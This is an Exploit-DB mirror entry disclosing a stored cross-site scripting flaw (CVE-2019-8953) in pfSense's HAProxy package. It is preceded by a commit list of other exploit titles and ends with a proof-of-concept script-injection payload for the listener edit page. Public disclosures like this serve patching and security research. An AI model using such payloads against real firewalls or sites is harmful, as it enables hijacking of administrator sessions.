exploit-db-mirror/exploits/php/webapps/46538.txt
Offensive Security c5fbc00e3e DB: 2019-03-14
8 changes to exploits/shellcodes

Microsoft Windows - .reg File / Dialog Box Message Spoofing
Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal
Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal

Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution
elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)
Apache Tika-server < 1.18 - Command Injection
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting
2019-03-14 05:01:58 +00:00

18 lines
No EOL
1.3 KiB
Text

# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting
# Date: 13.02.2019
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.pfsense.org
# Version: 2.4.4-p1/0.59_14
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953
##################################################################################################################################
Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers.
#################################################################################
Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php
PARAMETER Description
PAYLOAD "><script>alert("test")</script>